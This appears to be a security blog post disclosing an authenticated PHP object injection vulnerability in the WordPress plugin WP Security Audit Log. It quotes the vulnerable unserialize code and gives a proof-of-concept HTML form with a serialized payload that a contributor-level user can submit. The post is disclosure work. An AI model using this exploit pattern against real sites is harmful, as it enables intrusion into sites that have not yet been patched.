Last week, after running across a couple of PHP object injection vulnerabilities in the plugin WP GDPR Compliance we started looking into making an improvement of detection of that type of issue in our automated tool for detecting possible security issues in WordPress plugins, the Plugin Security Checker. As part of doing that we did some checks over the 1,000 most popular WordPress plugins to get a better idea of usage of code of similar code there might be out there. That led to us finding an authenticated PHP object injection vulnerability in the security plugin WP Security Audit Log, which has 70,000+ active installations according to wordpress.org.
That a security plugin can have a fairly serious vulnerability speaks to the one of the problems we see with the security industry’s ability to meet the needs of the public. On the one hand the average website, which shouldn’t need security products and services, are being sold ones that don’t work well at best. At the same time those websites that genuinely need advanced security tools are unable to get ones that work well and or they introduce security risks of their own. This plugin falls into the latter category both in that it is something that could be of useful for some websites, but also something that is introducing additional security risk.
Maybe not surprisingly, this isn’t the first time we have found a security vulnerability in this plugin.
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon).
Tomorrow we are going to be disclosing the same type of vulnerability that exists in theme with 70,000+ installs. That is unless the WordPress folks move to clean up their act between now and then (which we hope they do).
In the file /classes/Sensors/Content.php the function EventPostChanged() is set to run “when a post is transitioned from one status to another“:
add_action( 'transition_post_status', array( $this, 'EventPostChanged' ), 10, 3 );
In that function the value of the POST input “post_custom” is set to the variable $post_custom and the run the through the function maybe_unserialize(), which permits PHP object injection to occur:
46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65
$filter_input_args = array( 'post_ID' => FILTER_VALIDATE_INT, '_wpnonce' => FILTER_SANITIZE_STRING, 'original_post_status' => FILTER_SANITIZE_STRING, 'sticky' => FILTER_SANITIZE_STRING, 'action' => FILTER_SANITIZE_STRING, '_inline_edit' => FILTER_SANITIZE_STRING, 'mainwpsignature' => FILTER_SANITIZE_STRING, 'function' => FILTER_SANITIZE_STRING, 'new_post' => FILTER_SANITIZE_STRING, 'post_custom' => FILTER_SANITIZE_STRING, ); // Filter $_POST array for security. $post_array = filter_input_array( INPUT_POST, $filter_input_args ); // Check MainWP $_POST members. $new_post = isset( $post_array['new_post'] ) ? $post_array['new_post'] : false; $post_custom = isset( $post_array['post_custom'] ) ? $post_array['post_custom'] : false; $post_custom = maybe_unserialize( base64_decode( $post_custom ) );
As the proof of concept below shows that code can normally be accessed and exploited by users with the Contributor role and above.
Proof of Concept
With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” be shown, when logged in to WordPress as a contributor.
Make sure to replace “[path to WordPress]” with the location of WordPress, “[nonce]” and “[POST id]” with the values that can be found in the Add New Post page as the value of the inputs “_wpnonce” and “post_id”.
<html> <body> <form action="http://[path to WordPress]/wp-admin/post.php" method="POST"> <input type="hidden" name="_wpnonce" value="[nonce]" /> <input type="hidden" name="action" value="editpost" /> <input type="hidden" name="post_ID" value="[POST ID]" /> <input type="hidden" name="post_custom" value="TzoyMDoicGhwX29iamVjdF9pbmplY3Rpb24iOjA6e30=" /> <input type="submit" value="Submit" /> </form> </body> </html>